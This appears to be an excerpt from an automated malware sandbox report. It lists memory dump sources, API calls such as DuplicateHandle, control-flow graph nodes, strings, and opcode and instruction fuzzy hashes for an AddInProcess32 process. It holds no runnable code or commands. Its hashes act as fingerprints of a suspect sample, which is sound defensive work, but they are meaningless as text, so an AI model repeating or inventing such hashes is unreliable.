                                                                                    • Snapshot File: hcaresult_4_2_6250000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 0849836487778959c8595a75b2c8f6ae068eab79ab7b933e1f3b640a8ffdb4a4
                                                                                    • Instruction ID: a2bc0f7fdaf71b7246aab01e24cafd2d214d746c2b7258c2dd9c2aed5f3d9bb0
                                                                                    • Opcode Fuzzy Hash: 0849836487778959c8595a75b2c8f6ae068eab79ab7b933e1f3b640a8ffdb4a4
                                                                                    • Instruction Fuzzy Hash: E221E4B5D002499FDB10CFAAD885ADEFFF5EB48320F14841AE918A3350D374A954CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1828 625aac8-625ab5c DuplicateHandle 1829 625ab65-625ab82 1828->1829 1830 625ab5e-625ab64 1828->1830 1830->1829
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0625AB4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2987996861.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_6250000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 48dc7ae168504e84599622ef3011fcdb255cfc109cbae0ece46e1effe1ef6386
                                                                                    • Instruction ID: 1d5d043643223fe6ba4ba26c47b7c6b3dc1670ba0c0b23f78051f1bd504e4fa6
                                                                                    • Opcode Fuzzy Hash: 48dc7ae168504e84599622ef3011fcdb255cfc109cbae0ece46e1effe1ef6386
                                                                                    • Instruction Fuzzy Hash: 0421E3B59002489FDB10DF9AD885ADEBBF5EB48320F14841AE918A3250D374A954CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2969952500.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_cad000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 45da7cecdf683771eb0fc82213ee01535e9a099167571444d1f2aa2c0decbe70
                                                                                    • Instruction ID: fba51ab1645ea2da8eb49f9ccaeb0bbade583f6e1a54336cd056de9ec2d771a1
                                                                                    • Opcode Fuzzy Hash: 45da7cecdf683771eb0fc82213ee01535e9a099167571444d1f2aa2c0decbe70
                                                                                    • Instruction Fuzzy Hash: C421D0B5604205DFCB14DF24D9C4B26BBA5EB99318F24C969E80B4B696C33AD807CA61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2969952500.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_cad000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2c89a9e69767b05d00e1c806109b6c8f4bb73f43675b3203d38d20d2fa11d48e
                                                                                    • Instruction ID: 9307c611acb76d425256996685b7bebbf43ddc5809c116b5fb253a3970a2ff06
                                                                                    • Opcode Fuzzy Hash: 2c89a9e69767b05d00e1c806109b6c8f4bb73f43675b3203d38d20d2fa11d48e
                                                                                    • Instruction Fuzzy Hash: 832165755093C08FDB12CF24D594715BF71EB46314F28C5DAD84A8F6A7C33A990ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2987996861.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_6250000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                    • API String ID: 0-2222239885
                                                                                    • Opcode ID: 061852d6d451dac48e0d746871bb91d387cebc91e646ebe6bc47e59d56dd2bd9
                                                                                    • Instruction ID: fcea84a5945c795aad6f901f28afa95d844881399a24dd6108705ba29a988d99
                                                                                    • Opcode Fuzzy Hash: 061852d6d451dac48e0d746871bb91d387cebc91e646ebe6bc47e59d56dd2bd9
                                                                                    • Instruction Fuzzy Hash: C7122C30E10219CFDB68DF65C854A9EB7F2BF88341F219569D80AAB355EB309D85CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2970775377.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_e10000_AddInProcess32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \V^o
                                                                                    • API String ID: 0-832254231
                                                                                    • Opcode ID: e6af6a74a472179a3d689218971ec0611f9fb1ed41a6fc96e1c6705e4c63ce54
                                                                                    • Instruction ID: 0bd0a17d3f3a9e3fe170698cd5630f89721b4406d647f47e6d6fc012bf40ceb2
                                                                                    • Opcode Fuzzy Hash: e6af6a74a472179a3d689218971ec0611f9fb1ed41a6fc96e1c6705e4c63ce54
                                                                                    • Instruction Fuzzy Hash: 98B11CB0E002098FDB14DFA9D8857DDBBF2BF88718F149529E415B7394EB749885CB81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%